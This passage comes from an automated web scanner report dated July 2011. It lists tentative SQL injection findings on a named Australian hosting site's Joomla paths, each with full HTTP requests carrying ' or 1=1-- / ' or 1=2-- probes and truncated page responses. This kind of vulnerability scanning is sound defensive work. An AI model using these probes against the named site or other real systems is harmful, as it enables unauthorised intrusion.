<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component10454269' or 1=2-- /option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520
...[SNIP]...

1.7. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15648684'%20or%201%3d1--%20 and 15648684'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting15648684'%20or%201%3d1--%20/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:54 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37580
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting15648684'%20or%201%3d2--%20/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:56 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23737
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting15648684' or 1=2-- /Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520
...[SNIP]...

1.8. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16980299'%20or%201%3d1--%20 and 16980299'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting/Itemid,5816980299'%20or%201%3d1--%20/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:29 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28359
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence - Australian Based Virtual Private Server (VPS) Hosting</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" cla
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting/Itemid,5816980299'%20or%201%3d2--%20/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:30 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 28303
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" class="menu" align="center">
<table cellspacing="0"
...[SNIP]...

1.9. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 67726407'%20or%201%3d1--%20 and 67726407'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component/option,com_webhosting/Itemid,58/catid,1967726407'%20or%201%3d1--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:05:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:05:01 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 25057
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Network Presence - Australian Based Virtual Private Server (VPS) Hosting</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<d
...[SNIP]...

Request 2

GET /index.php/component/option,com_webhosting/Itemid,58/catid,1967726407'%20or%201%3d2--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:05:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:05:02 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 24996
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="text/css">
#banner {
background:url(/templates/aurora/images/blue/headimg_blue.jpg) no-repeat;
}
</style>



</head>

<body class="mainbody">
   <div id="wrapper">
       <div id="mainhead1">
        <div id="flash">
       <div class="moduletable">
                   <table width="100%" border="0" cellpadding="0" cellspacing="1"><tr><td nowrap="nowrap"><a href="/" class="mainlevel" >Home</a><span class="mainlevel"> | </span><a href="http://www.networkpresence.com.au/index.php/Log-in.html" class="mainlevel" >Log-In</a><span class="mainlevel"> | </span><a href="http://netpr.es/register" class="mainlevel" >Register</a></td></tr></table>        </div>
   
               </div>
               <div id="logo">
<!-- <a href="/index.php"><img src="/templates//images//logo.png" style="border:0;" alt=""/></a>-->
</div>

           



</div>

               <div id="horiznav">
                   
<!--swMenuFree5.0J_1.5 transmenu by http://www.swmenupro.com-->
<div id="wrap" class="menu" align="center">
<table cellspacing=
...[SNIP]...

1.10. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 49404679'%20or%201%3d1--%20 and 49404679'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules49404679'%20or%201%3d1--%20/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules49404679'%20or%201%3d2--%20/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:11 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules49404679' or 1=2-- /mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.11. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19827343'%20or%201%3d1--%20 and 19827343'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow19827343'%20or%201%3d1--%20/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
